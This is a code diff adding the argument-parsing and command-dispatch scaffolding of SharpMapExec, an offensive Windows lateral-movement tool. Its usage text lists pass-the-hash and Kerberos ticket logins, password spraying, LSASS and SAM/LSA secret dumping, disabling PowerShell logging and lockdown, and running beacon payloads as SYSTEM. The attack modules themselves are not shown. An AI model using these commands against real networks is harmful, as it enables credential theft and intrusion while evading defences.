sharp map

from @cube0x0

inc/SharpMapExec/SME/Args/ArgumentParser.cs

@@ -0,0 +1,31 @@
+using System.Collections.Generic;
+using System.Diagnostics;
+
+namespace SharpMapExec.args
+{
+    public static class ArgumentParser
+    {
+        public static ArgumentParserResult Parse(IEnumerable<string> args)
+        {
+            var arguments = new Dictionary<string, string>();
+            try
+            {
+                foreach (var argument in args)
+                {
+                    var idx = argument.IndexOf(':');
+                    if (idx > 0)
+                        arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
+                    else
+                        arguments[argument] = string.Empty;
+                }
+
+                return ArgumentParserResult.Success(arguments);
+            }
+            catch (System.Exception ex)
+            {
+                Debug.WriteLine(ex.Message);
+                return ArgumentParserResult.Failure();
+            }
+        }
+    }
+}

inc/SharpMapExec/SME/Args/ArgumentParserResult.cs

@@ -0,0 +1,22 @@
+using System.Collections.Generic;
+
+namespace SharpMapExec.args
+{
+    public class ArgumentParserResult
+    {
+        public bool ParsedOk { get; }
+        public Dictionary<string, string> Arguments { get; }
+
+        private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
+        {
+            ParsedOk = parsedOk;
+            Arguments = arguments;
+        }
+
+        public static ArgumentParserResult Success(Dictionary<string, string> arguments)
+            => new ArgumentParserResult(true, arguments);
+
+        public static ArgumentParserResult Failure()
+            => new ArgumentParserResult(false, null);
+    }
+}

inc/SharpMapExec/SME/Args/CommandCollection.cs

@@ -0,0 +1,50 @@
+using SharpMapExec.Commands;
+using System;
+using System.Collections.Generic;
+
+namespace SharpMapExec.args
+{
+    public class CommandCollection
+    {
+        private readonly Dictionary<string, Func<ICommand>> _availableCommands = new Dictionary<string, Func<ICommand>>();
+
+        // To Add A New Command:
+        //  1. Create your command class in the Commands Folder
+        //  2. That class must have a CommandName static property that has the Command's name
+        //      and must also Implement the ICommand interface
+        //  3. Put the code that does the work into the Execute() method
+        //  4. Add an entry to the _availableCommands dictionary in the Constructor below.
+
+        public CommandCollection()
+        {
+            _availableCommands.Add(kerbspray.CommandName, () => new kerbspray());
+            _availableCommands.Add(kerberosSmb.CommandName, () => new kerberosSmb());
+            _availableCommands.Add(kerberosWinrm.CommandName, () => new kerberosWinrm());
+            _availableCommands.Add(kerberosReg32.CommandName, () => new kerberosReg32());
+            _availableCommands.Add(kerberosLdap.CommandName, () => new kerberosLdap());
+            _availableCommands.Add(NtlmWinrm.CommandName, () => new NtlmWinrm());
+            _availableCommands.Add(NtlmSmb.CommandName, () => new NtlmSmb());
+            _availableCommands.Add(NtlmCim.CommandName, () => new NtlmCim());
+            _availableCommands.Add(NtlmReg32.CommandName, () => new NtlmReg32());
+            _availableCommands.Add(NtlmLdap.CommandName, () => new NtlmLdap());
+        }
+
+        public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
+        {
+            bool commandWasFound;
+
+            if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
+                commandWasFound = false;
+            else
+            {
+                // Create the command object
+                var command = _availableCommands[commandName].Invoke();
+                // and execute it with the arguments from the command line
+                command.Execute(arguments);
+                commandWasFound = true;
+            }
+
+            return commandWasFound;
+        }
+    }
+}

inc/SharpMapExec/SME/Args/Info.cs

@@ -0,0 +1,71 @@
+using System;
+
+namespace SharpMapExec.args
+{
+    public static class Info
+    {
+        public static void ShowUsage()
+        {
+            Console.WriteLine("\r\n  SharpMapExec.exe\r\n  usage:");
+
+            //Cim
+            Console.WriteLine("\r\n    --- Cim ---");
+            Console.WriteLine(@"        Need plaintext password or the /impersonate flag");
+            Console.WriteLine(@"        SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET");
+            Console.WriteLine("\n       Available Cim modules");
+            Console.WriteLine(@"          /m:enable_winrm                             (Runs Enable-PSRemoting -Force)");
+            Console.WriteLine(@"          /m:disable_winrm                            (Runs Disable-PSRemoting -Force)");
+            Console.WriteLine(@"          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)");
+            Console.WriteLine(@"          /m:disable_pslogging                        (Modify registry to disable PowerShell Logging)");
+            Console.WriteLine(@"          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)");
+            Console.WriteLine(@"          /m:check_pslogging                          (Check PowerShell Logging registry)");
+
+            //Reg32
+            Console.WriteLine("\r\n    --- Reg32 ---");
+            Console.WriteLine(@"        SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET");
+            Console.WriteLine(@"        SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET");
+            Console.WriteLine("\n       Reg32 modules");
+            Console.WriteLine(@"          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)");
+            Console.WriteLine(@"          /m:disable_pslogging                        (Modify registry to disable PowerShell Logging)");
+            Console.WriteLine(@"          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)");
+            Console.WriteLine(@"          /m:check_pslogging                          (Check PowerShell Logging registry)");
+
+            //Smb
+            Console.WriteLine("\r\n    --- Smb ---");
+            Console.WriteLine(@"        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET");
+            Console.WriteLine(@"        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET");
+            Console.WriteLine("\n       Smb modules");
+            Console.WriteLine(@"          /m:shares                                   (Scan for accessible Smb shares)");
+
+            //WinRm
+            Console.WriteLine("\r\n    --- WinRm ---");
+            Console.WriteLine(@"        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET ");
+            Console.WriteLine(@"        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET");
+            Console.WriteLine("\n       WinRm modules");
+            Console.WriteLine(@"          /m:exec /a:whoami                           (Invoke-Command)");
+            Console.WriteLine(@"          /m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)");
+            Console.WriteLine(@"          /m:comsvcs                                  (Dump & parse lsass)");
+            Console.WriteLine(@"          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)");
+            Console.WriteLine(@"          /m:assembly /p:Rubeus.exe /a:dump           (Execute local C# assembly in memory)");
+            Console.WriteLine(@"          /m:assembly /p:beacon.exe /system           (Execute local C# assembly as System in memory)");
+            Console.WriteLine(@"          /m:assembly /p:getMailBox.exe /delegwalk    (Execute local C# assembly in all unique delegation processes in memory)");
+            Console.WriteLine(@"          /m:download /path:C:\file /destination:file (Download file from host)");
+            Console.WriteLine(@"          /m:upload   /path:C:\file /destination:file (Upload file to host)");
+
+            //domain
+            Console.WriteLine("\r\n    --- Domain ---");
+            Console.WriteLine(@"        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC");
+            Console.WriteLine(@"        SharpMapExec.exe tgtdeleg");
+
+            //ldap
+            Console.WriteLine("\r\n    --- Ldap ---");
+            Console.WriteLine(@"        SharpMapExec.exe ntlm ldap /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE");
+            Console.WriteLine(@"        SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>");
+            Console.WriteLine("\n       Ldap modules");
+            Console.WriteLine(@"          /m:spraydata                                (Download user and password policy)");
+
+
+            Console.WriteLine("\r\n");
+        }
+    }
+}

inc/SharpMapExec/SME/Commands/ICommand.cs

@@ -0,0 +1,9 @@
+using System.Collections.Generic;
+
+namespace SharpMapExec.Commands
+{
+    public interface ICommand
+    {
+        void Execute(Dictionary<string, string> arguments);
+    }
+}